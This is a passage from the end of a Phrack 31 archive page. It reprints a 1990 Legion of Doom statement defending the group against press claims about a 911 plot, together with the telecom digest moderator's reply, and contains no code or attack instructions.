  3567. only know to the two of them. Hmmmm... carry this conversation to the
  3568. programming board.
  3569. Anyway, I do not think I am due to be busted, but then again, I don't do
  3570. anything but run a board. Still, there is that possibility. I assume that my
  3571. lines are all tapped until proven otherwise.
  3572. There is some question to the wisdom of leaving the board up at all, but I hae
  3573. (have) personally phoned several government investigators and invited them to
  3574. join us here on the board. If I begin to feel that the board is putting me in
  3575. any kind of danger, I'll pull it down with no notice - I hope everyone
  3576. understands.
  3577. It looks like it's sweeps-time again for the feds. Let's hope all of us are
  3578. still around in 6 months to talk about it.
  3579. The Mentor
  3580. Legion of Doom!
  3581. [Phoenix Project has been down for some time now.]
  3582. ---------------
  3583. Newsgroups: comp.dcom.telecom
  3584. Subject: The Purpose and Intent of the Legion of Doom
  3585. Message-ID: <4248@accuvax.nwu.edu>
  3586. From: anytown!legion@cs.utexas.edu (Legion of Doom)
  3587. Date: 22 Feb 90 04:42:04 GMT
  3588. Sender: news@accuvax.nwu.edu
  3589. Organization: Anytown USA
  3590. Approved: Telecom@eecs.nwu.edu
  3591. X-Submissions-To: telecom@eecs.nwu.edu
  3592. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3593. X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5
  3594. Lines: 51
  3595. [Moderator's Note: This anonymous message came in the mail today.  PT]
  3596. Well, I had to speak up. There has been a lot of frothing (mostly by
  3597. people who believe everything that they read in the paper) about
  3598. Legion of Doom. I have been involved in the group since 1987, and
  3599. dislike seeing irresponsible press concerning our "plot to crash 911"
  3600. or our "links to organized crime."
  3601. LOD was formed to bring together the best minds from the computer
  3602. underground - not to do any damage or for personal profit, but to
  3603. share experiences and discuss computing. The group has *always*
  3604. maintained the highest ethical standards of hacker (or "cracker," as
  3605. you prefer) ethics.  On many occasions, we have acted to prevent abuse
  3606. of systems that were *dangerous* to be out - from government systems
  3607. to Easter Seals systems.  I have known the people involved in this 911
  3608. case for many years, and there was *absolutely* no intent to interfere
  3609. with or molest the 911 system in any manner. While we have
  3610. occasionally entered a computer that we weren't supposed to be in, it
  3611. is grounds for expulsion from the group and social ostracism to do any
  3612. damage to a system or to attempt to commit fraud for personal profit.
  3613. The biggest crime that has been committed is that of curiosity. Kim,
  3614. your 911 system is safe (from us, at least). We have been instrumental
  3615. in closing many security holes in the past, and had hoped to continue
  3616. to do so in the future. The list of computer security people who count
  3617. us as allies is long, but must remain anonymous. If any of them choose
  3618. to identify themselves, we would appreciate the support.
  3619. I am among the people who no longer count themselves as "active"
  3620. members of the group. I have been "retired" for well over a year. But
  3621. I continue to talk to active members daily, and support the group
  3622. through this network feed, which is mail-routed to other LODers, both
  3623. active and accessible.
  3624. Anyone who has any questions is welcome to mail us - you'll find us
  3625. friendly, although a bit wary. We will also be glad to talk voice with
  3626. anyone if they wish to arrange a time to call.  In spite of all the
  3627. media garbage, we consider ourselves an ethical, positive force in
  3628. computing and computer security. We hope others will as well.
  3629. The Mentor/Legion of Doom
  3630. legion%anytown.uucp@cs.utexas.edu
  3631. [Moderator's Note: As an 'ethical, positive force in computing', why
  3632. can't you sign your name to messages such as the above?  Usually I
  3633. don't even consider anonymous messages for publication in the Digest;
  3634. but your organization has a perfect right to tell your side of the
  3635. story, and I am derelict if I don't print it. Real names and
  3636. addresses go a long way toward closing credibility gaps here.  PT]
  3637. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3638.      There you go.  It's over now, forget it and move on.  Nothing more to
  3639. report on the subject that hasn't been printed, typed, spoken, or heard in the
  3640. last couple of months.
  3641.  
  3642. _______________________________________________________________________________
  3643. Phrack 31 -  .end
  3644.  
  3645.  
  3646.  
  3647. </pre>
  3648. </body>
  3649.